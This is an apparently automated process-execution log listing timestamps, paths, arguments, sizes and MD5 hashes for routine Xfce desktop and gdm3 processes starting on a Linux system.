                                                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/etc/gdm3/PrimeOff/Default
                                                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfdesktop
                                                                                  Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                  File size:473520 bytes
                                                                                  MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-panel
                                                                                  Arguments:xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
                                                                                  File size:375768 bytes
                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfdesktop
                                                                                  Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                  File size:473520 bytes
                                                                                  MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-panel
                                                                                  Arguments:xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
                                                                                  File size:375768 bytes
                                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfwm4
                                                                                  Arguments:xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
                                                                                  File size:420424 bytes
                                                                                  MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:15
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfdesktop
                                                                                  Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                  File size:473520 bytes
                                                                                  MD5 hash:dfb13e1581f80065dcea16f2476f16f2